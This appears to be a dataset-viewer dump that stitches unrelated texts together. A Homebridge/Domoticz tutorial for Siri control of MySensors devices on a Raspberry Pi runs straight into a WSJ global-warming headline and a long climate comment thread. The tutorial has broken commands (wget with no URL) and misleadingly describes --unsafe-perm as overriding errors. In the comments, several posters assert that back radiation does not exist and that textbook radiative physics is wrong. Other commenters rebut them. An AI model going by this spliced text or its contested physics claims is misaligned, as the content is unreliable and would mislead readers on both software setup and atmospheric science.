text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
You have developed your own objects connected based Arduino (or ESP8266) and MySensors library, here’s how to drive through voice Siri or from the new application House (HomeKit) of iOS10 . In this first tutorial, we’ll install and configure Homebridge with Domoticz. Contents - 1 Required configuration - 2 Install and configure Homebridge for Domoticz - 3 Adding MySensors object under Domoticz - 4 Configure iPhone or iPad application House - 5 Does it work outside my home? - 6 Fly to voice your Domoticz devices with Siri Required configuration To achieve this tutorial you will need the following items. A Raspberry Pi 3 (or 2) Pi Raspberry with Domoticz installed and configured. If you’re new to home automation on or Domoticz , here is a series of articles to help you (in French at the moment !) : - Installation et configuration de Domoticz sur Raspberry Pi 2 ou 3 - Installer Domoticz sur Raspberry Pi et la distribution Raspbian Jessie A MySensors Gateway. For this tutorial, I used a Gateway network based ESP8266. You can start with this How To post (in french) to build a Network Gateway. At the time of writing this tutorial, version 2 of the MySensors library is not yet officially supported by Domoticz but it works very well. An iPhone running iOS 9 or iOS10. For this article I used an iPhone 6s under iOS10. Install and configure Homebridge for Domoticz Homebridge is an Open Source project developed by Nick Farina (Github , website). Homebridge is a modular project which can add plugins depending on the material you want to add to the iPhone (or iPad). There are already more than 260 (the list here). There are plugins for leading software automation (Domoticz, Home Assistant, OpenHAB, Jeedom, FHEM…) and for many materials (bulbs Philips Hue, Synology NAS). To install and configure Homebridge, I you Council to follow this tutorial . I met configuration with Domoticz difficulties in following the official tutorial (even if the procedure is similar to the final). Before you begin, be sure that your system is up-to-date sudo apt-get update sudo apt-get upgrade If you have installed Domoticz from the official image, then already extend the partition to make it all of the space on the SD card. sudo raspi-config and Option 1 – Expand Filesystem. Then Finish and finally Allow reboot . Install nodejs Before installing Homebridge, it is necessary to install Nodejs. Follow the following steps that correspond to your Raspberry model. Raspberry Pi A/B/B+ (old versions) sudo apt-get remove nodejs sudo rm -rf /usr/local/{lib/node{,/.npm,_modules},bin,share/man}/{npm*,node*,man1/node*} /var/db/receipts/org.nodejs.* hash -r wget tar -xvf node-v6.3.1-linux-armv6l.tar.gz cd node-v6.3.1-linux-armv6l sudo cp -R * /usr/local/ cd ~/ Raspberry Pi 2 ou 3 sudo apt-get remove nodejs sudo rm -rf /usr/local/{lib/node{,/.npm,_modules},bin,share/man}/{npm*,node*,man1/node*} /var/db/receipts/org.nodejs.* hash -r wget tar -xvf node-v6.3.1-linux-armv7l.tar.gz cd node-v6.3.1-linux-armv7l sudo cp -R * /usr/local/ cd ~/ Installation de Homebridge et eDomoticz Now we can install Homebridge and Domoticz plugin. sudo npm set prefix '/usr' -g sudo npm update -g homebridge --unsafe-perm sudo npm update -g homebridge-edomoticz --unsafe-perm sudo apt-get install libavahi-compat-libdnssd-dev small explanations for those who do not npm - -g allows to make the overall usable package. Without the -g, the package is usable for the installation directory. In this case everything is downloaded in the directory of npm and all other packages can use. - option – unsafe-perm allows you to override any error messages during the installation Get the Mac address of your Raspberry PI. It is unrated but without this configuration (trick found here), you may not be able to detect the gateway Homebridge on iPhone (or iPad). Run ifconfig. The Mac address of the RPI is HWaddr right . Now create a folder for Homebridge mkdir ~/.homebridge Then, open the configuration file in a text editor (pico or nano). sudo nano ~/.homebridge/config.json Paste this default configuration as a basis for an existing Domoticz server. Change the value of the username key by entering the Mac address of the Raspberry Pi. Warning. You must enter the Mac address in uppercase otherwise it will cause an error and stop Homebridge. You can use this to assign your Pin code. { "bridge": { "name": "Homebridge", "username": "ADRESSE_MAC_PI", "port": 51826, "pin": "031-45-154" }, "description": "Configuration file for (e)xtended Domoticz platform.", "platforms": [ { "platform": "eDomoticz", "name": "eDomoticz", "server": "127.0.0.1", "port": "8080", "ssl": 0, "roomid": 0, "mqttenable": 1, "mqttserver": "127.0.0.1", "mqttport": "1883", "mqttauth": 0, "mqttuser": "", "mqttpass": "" } ], "accessories": [] } Save CTRL + X, then Y. Now run Homebridge sudo homebridge Adding MySensors object under Domoticz For the purposes of this tutorial, I have prepared a small connected object that is composed of a contactor as well as a led to simulate the ignition and extinction of a lamp. We could very easily replace the Led by a relay to control a lamp or the opening of an electric gate for example. To achieve this Assembly, you will need the following items : - 1x ESP8266 ESP-12F. For example a Wemos D1 Mini - 1x Led - 1x 220 Ω resistor - 1x reed switch - 1x nRF24L01+ radio module - 1x nRF24L01+ plate connector (optionnal but recommended) - 1x breadboard (optional) - Some Dupont Jumpers Circuit The radio nRF24L01 + module must be powered by 3, 3Volts. On the other hand, the power 3.3V on some maps is average. It is better to use a socket adapter plate which has a better voltage regulator. Code With version 2 of MySensors, it is possible to add one (or more) node to a gateway. Here is the code of an ESP8266 WiFi Gateway which allows you to back up the state of a contact (detect the opening of a door for example) and simulate a flashlight with a Led lighting/extinguishing. Before upload code in your ESP8266, change the following parameters: - MY_ESP8666_SSID: the name of the WiFi network - MY_ESP8666_PASSWORD: and password - MY_IP_ADDRESS: it is best to set the ip address of the Gateway… - MY_IP_GATEWAY_ADDRESS and SUBNET that matches your router /** *_GATEWAY_ESP8266 #define MY_ESP8266_SSID "SSID" #define MY_ESP8266_PASSWORD "PASSWORD" // Enable UDP communication //#define MY_USE_UDP //,20 // If using static ip you need 3 // Controller ip address. Enables client mode (default is "server" mode). // Also enable this if MY_USE_UDP is used and you want sensor data sent somewhere. //#define MY_CONTROLLER_IP_ADDRESS 192, 168, 178, 68 //> #else #include <ESP8266WiFi.h> #endif #include <MySensors.h> #define CHILD_ID_CONTACTEUR 0 #define CHILD_ID_LED 1 #define CHILD_ID_LEVELBAT 2 #define CONTACTEUR_PIN D3 // Broche sur laquelle est attaché le contacteur (2 ou 3 si on veut #define LED_PIN D1 // Broche sur laquelle est branchée l'actionneur (LED, Relay...) #define FREQ_ENVOI 10000 // Force l'envoi d'état au bout de 2s boolean etatPrecedent = false; unsigned long dernierEnvoi = 0; MyMessage msgContacteur(CHILD_ID_CONTACTEUR, V_TRIPPED); MyMessage msgLed(CHILD_ID_LED,V_LIGHT); void setup() { pinMode(CONTACTEUR_PIN, INPUT); pinMode(LED_PIN, OUTPUT); digitalWrite(CONTACTEUR_PIN, HIGH); digitalWrite(LED_PIN, HIGH); } void presentation() { // Send the sketch version information to the gateway and Controller sendSketchInfo("Gateway MySensors v2", "1.0"); // Register all sensors to gateway (they will be created as child devices) present(CHILD_ID_CONTACTEUR, S_DOOR); present(CHILD_ID_LED, S_LIGHT); } void loop() { uint8_t etat; unsigned long tempsActuel = millis(); // Read contact state / Lit l'état du contacteur etat = digitalRead( CONTACTEUR_PIN ); // == LOW; if ( etat != etatPrecedent || ( tempsActuel - dernierEnvoi > FREQ_ENVOI ) ) { etatPrecedent = etat; dernierEnvoi = tempsActuel; Serial.print("Etat du contacteur modifie "); Serial.println(etat ? "Ouvert " : "Ferme" ); send( msgContacteur.set( etat ? "1" : "0" ) ); } delay(5); } void receive(const MyMessage &message) { // We only expect one type of message from controller. But we better check anyway. if (message.isAck()) { Serial.println("This is an ack from gateway"); } if (message.type == V_LIGHT) { // Change relay state bool state; state = message.getBool(); digitalWrite(LED_PIN, state? LED_OFF:LED_ON); // Store state in eeprom saveState(CHILD_ID_LED, state); // Write some debug info Serial.print("Incoming change for sensor:"); Serial.print(message.sensor); Serial.print(", New status: "); Serial.println(message.getBool()); } } Configuration of the devices under Domoticz To learn about how to add an object MySensors under Domoticz, follow this tutorial (in french), if not here is the steps in (accelerated). Add a MySensors Lan Gateway in settings -> material . Specify the ip address of the Gateway and the port. Name, and then Add . Add the devices from settings -> devices-> press the arrow green in front of every device to add. Type a name for the device. After adding, the arrow turns blue. Go to the switches and change views if necessary. Now rerun Homebridge to see devices that will be visible to iOS. Configure iPhone or iPad application House On your iPhone or iPad (preferably under minimum iOS10), launch the home application. Uour iPhone (or iPad) must be connected to the local network in WiFi to be able to add a bridge and accessories. Tap Add aaccessory. Include in Favorites. Include all the accessories that you want to find in the center of the LockScreen notification. Awarded a place. Assign a place to fly the accessories to the voice since Siri more easily. It suffice to say “light show” or “turn off the light in the living room…” It’s over! You can also look at the active icons of accessories. Lock your iPhone and open the notification Center. Drag the Panel to right twice to access the control panel of the Home Favorites. Does it work outside my home? Here is the main interest to use the application (HomeKit) Home of iSO10. You don’t need to expose your Automation server to the internet. It is iOS (HomeKit) and Apple servers via your iCloud account that takes care of everything and this in a secure way. But to make it work, you need a compatible hardware HomeKit home and must be turned on (.. .and loaded). Here’s what you can do based on your hardware (go to this page Apple to learn) - to control accessories remote - 3rd generation Apple TV. It is not possible to access the HomeKit surveillance cameras. - 4th generation Apple TV equipped with tvOS 9.0 or higher - to set up the automation and the permissions of users - 4th generation under APPLETV tvOS 10 - iPad IOS 10 In summary, so you’ll need a fairly new iPad (iPad Air for example) or Apple TV of 4th generation (to be able to create simple scenarios). When you use home away from home, it will take a few seconds the that ‘ HomeKit retrieves the connection with the material playing the role of repeater (hub HomeKit). The 3rd generation Apple TV is still usable but the features are more limited (cannot use a camera home automation, creating automation, manage users). You have problems outside the home you Do not expect an immediate response to your actions when your iPhone is more connected to WiFi to Domoticz (or any certified device HomeKit). It takes some time for action in iCloud and then goes down on the iPad or Apple TV from your home. Even if iCloud has made big progress in terms of reliability and performance, there is a latency time which may also come from your 4 G (or 3 G) connection. Let’s say that a delay of a few seconds is not unusual. Another finding, the status of accessories is not updated in real time in the notification Center. For example, if a switch goes back the opening of a door, the corresponding icon will not be enabled. The status of an accessory is updated to the Panel or display during manual action from the Panel. Finally last point, Homebridge is a project “border line”. It is not included in a certified Apple product. We stay in the DIY, it works very well, but from time to time… Fly to voice your Domoticz devices with Siri Now that everything works in Home, it’s time to test the voice command with Siri. Try to turn on the light in the living room-online “Hey Siri turns on the light in the living room”. Similarly to turn off say “turn off the light in the living room. Finally, ask Siri if the door is closed: “Hey Siri the door is open.” List of commands that work with Siri and advice So that Siri is able to make the link with the accessory Domoticz, name the exactly by its designation. Rather than putting an extension designation, best is to assign a place to each accessory. It allows Siri to make the connection easier. By example, rather than assign ‘light show’, ‘light’ name and create a “lounge”. Otherwise when asked ‘ light show ‘ it doesn’t work. If you have many accessories, you have to standardize your designations, or station to headache to remember the name given to the lamp in the attic ;-). Under iOS10, here is a list of actions that you can perform at the votes with Siri ( from this list ): You can also create and trigger scenes. To call him, simply saying his name, for example “Hey Hello Siri”. To create a scene, go to the parts , Press the more then Add a scene. There are already existing scenes in the list. Finish the configuration. For example the scene Hello to turn on all the lights in the living room. It’s ready. Homebridge is a large community-supported Open Source project. Its very open architecture allowed the third development of many plugins. The eDomoticz plugin is very complete and responsive to the actuators. Turn on, turn off a lamp answers instantly. The update of the State of a contactor is longer, it is not uncommon to wait almost a minute. Side iOS, the Domoticz is very simple and intuitive. You can even drive your installation from your iPhone out of the House without having to make your Raspberry Pi available on the internet. It is a true guarantee of security. Side scenarios, the home application is much less advanced than software automation, but the combination of the two solutions is really very soft and nice to use.
https://diyprojects.io/homebridge-domoticz-fly-mysensors-objects-siri-ios10/
CC-MAIN-2019-22
refinedweb
2,349
55.34
Sept. 4, 2014 7:20 p.m. ET. 177 thoughts on “Matt Ridley in the WSJ: Whatever Happened to Global Warming?” Please form a neat orderly queue at the humble pie counter. wsj.com allows comments. My favorite was: “Global warming is caused by the desire for more tax money.” It’s nice that its in the WSJ but the WSJ doesn’t make policy. The unelected EPA gets free reign to do whatever it pleases and they want to pretend everything is worse than we thought. According to media gospel, California is national leader on environmental regulation, if we defund the federal EPA, then California and other States can still choose to be the national leader in environmental regulation, or they could also choose to lead from behind. It seems the federal EPA which could be said to already abused it’s authority, and as consequence it could in coming months find it’s funding reduced, but the more EPA abuses it’s authority, it seems it faces an even greater chance of cutting it’s budget being cut and or have it completely eliminated as federal agency. It also seems likely that further EPA abuses it’s authority, therefore encourage the possibility that agency is terminated, that this cause domino effect upon other federal agencies which are also poorly serving the American public. I agree with your analysis, but I am not too worried about individual states continuing the EPA’s reign of terror. True, if the EPA is declawed states could still issue draconian regulations. But if a state does so and its neighbors don’t then that state will likely see the effected businesses move to one of those neighbors. Without the EPA issuing country wide regulations any state that does so on its own will likely see an exodus of jobs and population. ddpalmer, See California for an example. Before all the environmental zealotry, it had one of the largest economies in the world (#5 in the 80s), after all the zealotry, they have fallen greatly, still one of the largest, but moving well down the list (somewhere between #8 and #10 inclusive – they’ve been playing leap-frog with Italy and the Russian Federation). While their natural beauty and generally benign (if a bit dry) environment will keep them popular, many businesses will head for greener pastures as the regulations begin to make profitability impossible. The thing that is really crazy is that California’s government will take a modest idea that may do some good and turn it into a Frankenstein’s monster of regulations and penalties, and they do it EVERY TIME. Sacramento is a place where good ideas go to die. I really hope other states do not look to them as a positive example. LOL with Owen in GA September 5, 2014 at 6:16 am many businesses will head for greener pastures I, for one, would LOVE to see California continue is Reign of Environmental Terror! It won’t take much more incentive for the last few manufacturing plants left there to pack up and move to Texas – wait, here comes another one!!! Defunding the EPA is a great idea. Given that the Department of Education has a negative effect on K-12 education it would be logical to defund that too. Then there is the Department of Agriculture, the Department of Energy……….the list goes on and on. Let’s keep the Department of Defense and increase its budget. What was that other department you want to get rid of, Governor Perry? Hmmmm. Oops. The WSJ is the number one read paper in the country. Decision makers do read this paper, maybe not lefties much. Free reign. Or free rein? Auto Only in Standard English. In 21st century American it can be rein, reign, rain, or rane. The next thing we will hear is ‘that’s what I always thought/suspected, so now it just goes to show I was right all along” (enter professor, pseudo-climate ‘scientist’ name here) Try not to list too many. Now can we start cutting the g$avy t$ain money or do we need to redouble the grants to find out why and prevent global cooling? The AGW scientists, greens, environmentalists, charities, government leaders, pressure groups etc. etc. who still like to use the ‘Global Warming’ and ‘Climate Change’ phrases to support their views regardless of the emphatic and hard empirical evidence that abounds to the contrary, would be advised when discussing the weather, farming, health and animal species etc., to quietly drop the phrases from their everyday public language, as many of their colleagues have already done, otherwise they will increasingly become the laughing stock of the wider sceptic public who have not seen any change in their living environment since the scare was first propagated over twenty years ago. Open a gap between Panama and South America :) Hey it’s not like anyone is using the Darién Gap anyway. That or spew soot all over the ice as it forms over the Northwest Territories and Siberia.. I totally agree. The laws of thermodynamics must be applied to this problem, not so called radiative physics. This problem cannot be framed or defined in such terms otherwise you end up with the nonsense that cold bodies can heat up warmer bodies, or water flowing up hill & the like. Anything‘s possible in cartoons and climate models. And statistics, I suppose. I’m not disagreeing with you, but while cold bodies can’t heat up warmer bodies, they can slow down the cooling of the warmer body, which I think is the basis of the AGW hypothesis. It’s not that CO2 heats up the planet – it’s that CO2 putatively slows the cooling. Personally, I think a moment’s reflection on the overwhelming heat transport of convection vs the relatively weak thermal properties of IR absorbtion/re-emission would have put this silly theory to rest. . Others like me feel embarrased whenever we see people unable to understand back radiation instead. So explain how back-radiation from the cold atmosphere adds net energy to the warmer surface! I have explained it very simply: an emittance (aka exitance) is a potential energy flux to a sink at absolute zero, not a real energy flux. This mistake, deeply embedded in atmospheric science, is ~50 years old and comes from Sagan who because he had made a humongous mistake in aerosol optical physics, thought he had proved Arrhenius’ claim of ‘black body’ surface emission from the Venusian surface. ‘Back radiation’ does not exist as a real flux. The Earth’s surface emits net IR at one sixth the black body level. There is zero surface IR emission in all self absorbed GHG bands, including 15 micron CO2. Climate Alchemists have been taught incorrect physics. The textbooks have to be changed back to standard physics. Climate researchers need to be retained. All the literature needs to be junked. Do I make myself clear? phillipbratby You ask It doesn’t. Back-radiation from the cold atmosphere inhibits net energy loss from the warmer surface to very cold space. Your question displays failure to understand what you are talking about. You could ask with equal validity, ‘So explain how coverage by a cold duvet adds net energy to your warmer body!’ Richard The back radiation scam is best explained in conjunction with the other major false claim, originating from 1981_Hansen_etal.pdf of a single -18 deg.C OLR emitter. That in turn creates in the two-stream approximation a down flux = |OLR|. Met Office modellers spuriously justify this on the basis of Kirchhoff’s law of Radiation by a radiative physics’ trick. There is no such zone. The end result is an energy budget of 238.5 W/m^2 thermalised SW + 333 W/m^2 ‘back radiation’ (reversing at the surface) – 238.5 W/m^2 = 333 W/m^2. This perpetual motion machine of the second creates 40% more energy than reality, used in conjunction with the false GHE = 33 K lapse rate warming, to justify increased latent heat. It’s a scam; the clever bit is how well it has been hidden by the modelling complexity and Sagan’s wrong aerosol physics (the sign of the AIE is reversed). As non-science guy I don’t understand. So if you point a thermal camera at the underside of the duvet, does it look cold? Stephan That depends on what you mean by “look cold”. Everything is warmer than absolute zero. And I cannot here help you if you cannot understand that a a duvet keeps you warm by inhibiting heat loss. Take an elementary in primary school physics. Richard I was using your words, “a cold duvet” so feel free to explain it how you mean it. I was asking what does the camera see when pointed at the inside of the duvet. stefan Please stop trying to pretend you are an idiot. I wrote Clearly, in that statement the word “cold” means not as warm as “your warmer body”. Richard “As non-science guy I don’t understand. So if you point a thermal camera at the underside of the duvet, does it look cold?” Stefan, please read again what AlecM wrote. The answer is there. Sorry to waste your time. I’m not a warmer nor an idiot. I simply don’t know the jargon. Plain English would help us “non-science guys”. Thing is, if it can’t be put into plain English, how do you know your colleagues here who disagree, know that they understand their own jargon either? AlecM ” Climate researchers need to be retained.” Climate researchers need to be retrained. Fixed it for ya. No charge :) and people like me get embarrassed when people like you are somehow using bad physics to model CO2’s effect on climate. If your existing CO2 physics was correct we would not have an existing 17 stop in climate warming we would have an accelerated rate of climate warming. Something is wrong with your back radiation and other aspects of CO2 as a green house gas !!! No, it merely shows that any “back” radiation received at the surface from an insulating blanket above has the effect of creating a slightly higher equilibrium temperature for all of the objects under the blanket, just as the First Law of thermodynamics would predict. Perfect equilibrium is never quite achieved, of course, but the Earth’s surface is warmer than it would be without its atmospheric ‘blanket’. I think all engineers and scientists would agree on that. The elephant in the room here is that H2O and aerosols, not CO2, dominate this effect and are the real agents responsible for climate change. Aerosols, unlike CO2, absorb incoming sunlight. Aerosols also contribute to albedo and reflect incoming sunlight, so have cooling properties as well as warming. A more complex equation, which current climate models do not adequately address. The only “triumph” that the IPCC, and their MSM fellow travelers, can brag about is that they’ve succeeded in convincing virtually everyone, including many lukewarm skeptics, that manmade CO2 is main culprit behind CAGW, a false notion. In reality it is a minor factor compared to H2O and aerosols. And water vapor is not a ‘green house gas’ in the same way as CO2 which is a radiative gas. CO2 when given sufficient energy by collision with other atmospheric molecules most likely N2 will emit that energy as an infrared photon in a random direction. If a CO2 molecule is hit by an IR photon of the right frequency it will start to vibrate and either almost immediately re-emit an IR photon (of a slightly different frequency) in a random direction, or if a collision takes place before remitting the IR, pass the vibrational energy onto another atmospheric molecule again most likely N2. Water holds heat as latent heat of phase change. So as cloud water molecules in droplets change phase to water vapor they absorb the latent heat of vaporization but do not change temperature. Similarly, when an ice crystal melts to become a water droplet its molecules emit the latent heat of fusion and do not change temperature. Conflating water vapor and carbon dioxide as ‘green house gases’ is not accurate as their behavior is totally different. Ian W You are spouting rubbish. Both CO2 and H2O are radiative greenhouse gases. It is a function of their molecular shapes. Richard Ian W: H2O is indeed a GHG in the same way as CO2. Both are compound molecules composed of two different atoms, unlike N2 or O2 but like CH4 or NOx. Water and carbon dioxide gas even share some overlap in their absorption bands. There is no ‘back radiation’, defined as a real energy flux. It is a radiation field isolated by placing a solid shield behind the detector. That radiation field, its power over a multi-wavelength detector or the integral of the ‘Poynting Vectors’ of individual wavelengths, is scaled with respect to the Planck Irradiation Function, the Radiation Field that he calculated would be emitted by a back body cavity emitter for a particular temperature. Only the vector sum of the opposing PIFs, called emittances or exitances, over the shared wavelength range, can do thermodynamic work. This is a result of Maxwell’s Equations. The real behaviour of the atmosphere is defined by self-absorption of the various GHG bands. For those who make statements about back radiation and it’s effect on surface temperature, and also how optically absorbing gases on a planet cause a temperature rise, see the following: If you don’t understand the analysis, please keep you uninformed comments to yourself. Yup; a good analysis. However, ‘back radiation’ is used by Climate Alchemists to claim feedback via the extra ‘forcing’ causing extra surface emittance. This is ludicrous, not even High School physics because it leads to 40% increase of energy from nowhere. The scintillation experiment shows the +/- 4x peaking individual amplitude for the thermal noise from various IR wavelengths. Increase IR ‘forcing’ and you get less net surface IR so it has to warm up to increase convection and evaporation. Never in science has so many mistakes been made by so many, and the dumb politicians like Obama paid for it! Leonard laments: “If you don’t understand the analysis, please keep you uninformed comments to yourself.” Such dangerous arrogance is the first sign of quackery. How did the Sky Dragons sneak back in here? You know, the ones who coauthored a book with the registered child rapist who is an iron sun crackpot? Yeah, *those* guys are telling us to shut up because we don’t understand their mere technical word games that amount to pure nonsense, noted too by string theorist Motl. Iron sun guy is on Goddard’s blog this week, invoking the singular ancient god of the Egyptions to invoke the beauty of neutron repulsion, spiritual center of all life in the solar system. Al Gore is lovin’ it, giggling on his way to the bank. -=NikFromNYC=-, Ph.D. in chemistry (Columbia/Harvard) To NikFromNYC: don’t ever imagine that I am a dragonslayer. They asked me to join but I prefer to be independent. If you claim you know physics, explain night-vision science. If the device measured the exitance of the source, the image would not shimmer back to zero amplitude. I have measured coupled convection and radiation for many decades and created process plant involving GHG heating and cooling. What I say goes because otherwise those production plants would not work. The Climate Alchemists can blame Carl Sagan and Goody who taught people like Lindzen incorrect physics. Any physicists who imagine exitance is a real energy flux need to go back to school. Only the vector sum of exitances at a plane give real net flux. I understand that the first sentence in the article linked to is wrong. Hence a straw man. As such, there is no need to read further. Your ignorance of the science is clear and I’ve got better things to do with my time. I’m guessing you don’t agree with this sentence (from the “Heat Transfer Handbook”). “All materials continuously emit and absorb electromagnetic waves, or photons, by changing their internal energy on a molecular level.” If you agree with that statement, you know how a cold body radiates energy to a warm body. If you think this violates the second law of thermodynamics, you don’t understand the second law. Enough about this. I’ll not respond further. NikFrom NYC, I have rejected the Sky Dragons positions, not supported it. Please read my analysis, as it explains the physics of backradiation, its actual effects, and what actually causes the atmospheric greenhouse effect. Until you read it and have real comments specifically on the material, you are just as bad as the sky dragons. My comment was not arrogance, it was a response to the many comments that were made by people that do not understand the basic physics, and was an appeal to not comment when you do not understand basic radiation physics.. Sure, I don’t disagree with this. However, one obvious component of that net resistance between the surface and 3K outer space is the radiative absorptivity of the atmosphere. Nobody I know seriously asserts that a single layer model is a particularly good one as in it will lead to good quantitative agreement with atmospheric radiative warming as it does indeed neglect things like active heat transport in convection and latent heat (which short circuit some fraction of the “bare” absorptive resistance), the thermal lapse rate, and so on. That doesn’t in any way negate the statement that there is almost certainly a positive, nonzero, in the dynamical response of the climate to more CO_2. Nonlinear complex behavior could confound it (with difficulty), and the derivative could be small enough to be utterly lost in noise and natural processes, and it could be (and I think, probably is) partially cancelled in the total derivative by negative feedbacks from other parts of the climate system, but it simply isn’t sensible to think that the “bare” linear response to more CO_2 is not increased average temperature. Beers-Lambert and almost any sensible model you like are going to predict a positive response, not a negative or neutral one. There is certainly nothing about this warming due to increased net resistance between surface and sink that violates the first or second law, however (an often-stated Slayer position) and at the end of the day, one can simply look at the figures in Petty’s book A First Course in Atmospheric Radiation”, which are direct observations of the greenhouse effect in action, fractionated by the lapsed temperature of the emitting layer per band in the relevant parts of the spectrum. I don’t know how anybody who understands electrodynamics could ever look at these graphs and not go hmm, yup, there is a greenhouse effect all right. The details of the many processes involved don’t make this good evidence that we should believe any of the “obvious” linearized single layer models, and sadly computing a detailed solution is basically impossible by twenty or thirty orders of magnitude (where we have no particularly good reason to think that nonlinear partial differential systems will suddenly become computable for this most difficult problem in the history of nonlinear partial differential systems at the scales we can afford to reach). In truth, what we are is far, far more ignorant about the climate than we think we are. Beyond the obvious autocorrelation times of the short range behavior, the one thing we learn about the climate from looking it its past (poorly known!) record is that it is not a stationary process. Modelling it with a stationary projective dynamical theory is just silly, and bound to fail. IMO. That means that we really don’t know what the climate will do in response to increased CO_2, any more than we know what it would have done if CO_2 hadn’t changed. But humans seem to really hate admitting that there is something that we don’t know. rgb I too have been scammed by almost-believable no-back-radiation arguments before now. Luckily, I remembered my basic physics just in time! It’s just necessary to remember that EVERYTHING radiates ALL the time, regardless of whether or not it is colder or hotter than another body. That’s the basic difference between radiative and conductive thermodynamics. AlecM is not confused – he just won’t bloody listen! To Uncle Gus and anyone else who has tried to take me on about basic physics. There is a serious problem with radiative heat transfer understanding. It comes from the earliest Law of Radiation, Prévost’s Theory of Exchanges. August Prévost in 1791 put forward the proposition that this was a continuous process, the net transfer between two bodies being the difference of the continuous fluxes, assumed to be at the S-B rate. This has confused generations of scientists. It’s because it conflicts with Maxwell’s Laws. John Henry Poynting in 1886 worked out the concept of the Poynting Vector; for a plane monochromatic wave this has a mean value of ε.c.E^2/2 where ε is the relative permittivity of free space, c the velocity of light and E the magnitude of the electric Vector. Poynting Vectors sum as vectors. Therefore if you have two equal temperature plates, insulated backs in a vacuum, a short distance apart, on average there is zero net radiative flux. This is not the S-B flux from one plate to the other minus the same in the other direction, with equal numbers of ‘photons’ in different directions. The photons do not exist until the instant they are transferred from matter to the ‘aether’ or vice-versa and on average, for zero net radiant heat flux, there are no photons created or destroyed. However, you do get thermal incoherence, and this is centred about zero but randomly goes to +/- 4x the amplitude of any monochromatic wave, hence the shimmering of night vision goggles or camera image. If anyone can find fault with this, please explain using correct physics. DO NOT make assumptions which you haven’t thought out and can’t prove by reference to experiment. Sky Dragons are banned here for the best of reasons. Not only are they crazy but their paper tiger back of the envelope slaying of the greenhouse effect allows alarmists to *hide* their positive feedbacks from the public eye by having Al Gore train activists to slander all climate model skeptics as being outright deniers of the greenhouse effect itself. And by now you and everybody here is very much well aware of this, and thus your motives are also suspect as you mix feedback arguments with Sky Dragon denial of the greenhouse effect itself, purposefully confusing the two, loudly, in a public forum. The difference between the textbook greenhouse effect and computer model assumptions is the central whistleblowing duty of any seasoned skeptic. Here, you help defeat that effort, or try to at least. NikFrom NYC, You continue to make statements when you do not even know what my position is and what I say. Read my writeup (the site I gave), and comment. Your preaching about the Sky Dragons is not relevant to me, I have disagreed with them. NikFrom NYC, Don’t quote your degrees to me. I have degrees in Physics (Florida State) and a ScD in Aerospace Engineering (GWU), and have given talks to Princeton, Cambridge, and many others. I do not like to throw my degrees around like you but need to respond here. No. Two opposing “energy vectors” do not cancel each out. That would be a violation of the energy conservation principle. Energy is a scalar quantity, not a vector. Electromagnetic energy is carried by photons. Yes, a photon could be characterized as a vector, propagating in a specific direction with speed c. But photons are bosons. They don’t follow the Pauli exclusion principle, so they don’t ‘collide’ with each other like ordinary particles (fermions). So unlimited numbers of bosons can occupy the same space without any interaction. At the molecular level, energy transfer caused by IR absorption takes place when a molecule absorbs an incoming IR photon, with a resultant increase in its scalar internal energy. What you’re suggesting is that when a molecule absorbs two photons coming from opposite directions, it says to itself: “Hey, I just hit by opposing photons, so I’m ignoring both of them”. But that can’t happen because the increase in internal energy is scalar, not dependent on the direction of the incoming photon. It all adds up because the scalar energy traveling in an electromagnetic wave can be modeled precisely by the scalar wave equation, a linear system. Go back to Planck and then work out the bit he missed out. He hated the idea of a photon. They do not exist except at the moment of energy transfer to or from Planck’s quantised dissipative oscillator at the ‘cavity’ in a surface of condensed matter or other energy transformation process. So, you must go to Maxwell’s Laws: conservation of energy requires that monochromatic heat transfer rate per unit volume of matter = – ∇.Fv where Fv is the monochromatic radiation flux density. Integrate this over all wavelengths and at a plane and you get Qdot = – ∆exitance at the plane. Add in thermal incoherence and for equal temperature emitters you have for each wavelength a standing wave of amplitude 2x each wavelength amplitude with a superimposed oscillation about zero peaking at +/- 4x each wavelength, hence the shimmering in the night vision goggles. For unequal temperatures you also have a travelling wave of amplitude equal to the difference of source amplitudes; only this energy flux exists. At the Earth’s surface, for equal temperature of surface and atmosphere, there is net zero IR emission in all the self-absorbed atmospheric GHG bands. The only mean net IR emission is 40 W/m^2 in the atmospheric window plus 23 W/m^2 in the weakly absorbed H2O bands with a few km emission/absorption depth. GHG absorption of IR is very different from absorption at a solid in that you cannot have thermalisation of the energy in the gas phase. If you did so, the absorptivity would exceed emissivity; can’t do that at local thermodynamic equilibrium, a breach of Kirchhoff’s Law of Radiation. So, you have to consider the gas phase and all heterogeneous boundaries; the excess energy only thermalises at those boundaries! Hence Tyndall’s experiment does not prove gas phase thermalisation – it happens at the inside surface of the brass tube! So, now you can see why Climate Alchemy’s ‘back radiation’ and ‘positive feedback’ is juvenile physics! I’m right with Nylo on this one. Look, the real problem here is that you do not really know these laws of thermodynamics of which you speak. There is absolutely no violation of either the first or second law in the fact that interpolating an absorptive layer between a heated object with finite heat capacity and an infinite capacity cold reservoir like the 3 K of outer space will cause the heated object’s temperature to go up. Not because it is being “warmed” by the absorptive layer — because the flow of heat from the heated object to the cold reservoir is slowed by the interpolated layer, and its temperature has to go up for it to stay in detailed balance. This is an open system with an external heat source, not a stationary problem in passive heat flow from one infinite reservoir to another as in an intro physics text book. The single layer model is readily available to look at, and can be solved by hand for the steady state in the limiting case of a perfect absorber. One can then analyze entropy changes and conclude that no processes involved violate the first or second law — quite the contrary, they are derived from a statement of the first law (which is energy conservation, after all) and the net entropy change involved is the transfer of heat from the original energy source, e.g the Sun, to the cold reservoir, e.g. outer space, via the intermediate steps of absorption and reradiation by the planet and absorption and reradiation by the interpolated layer. It is fine to argue that overall atmospheric feedbacks may — or even probably do — cancel out most of the differential warming caused by marginal increases in CO_2 at this point, if only because for the Earth to have approximately stable temperatures at all the stable temperature has to be a crossover point for water vapor feedback — water vapor (or if you prefer, the entire collective water cycle) has to respond to a positive temperature fluctuation by increasing cooling to push the system back towards equilibrium, and it has to respond to a negative temperature fluctuation by increading warming. Otherwise, the first time a warming fluctuation occurred, it would increase water vapor in the atmosphere, which would warm it further, which would increase water vapor still more, and the system would run away on the hot side. Note that I’m not asserting that it is only water vapor involved — the collective nonlinear feedback behavior of the system will be at the crossover in order for any temperature to be locally stable, so one always expects that the overall sign of the response to a “warming perturbation” to be negative cooling and to a “cooling perturbation” to be positive warming. This really is elementary physics — taught in any intro course when stable vs unstable equilibrium is considered. It can be confounded, of course, in nonlinear multivariate systems, 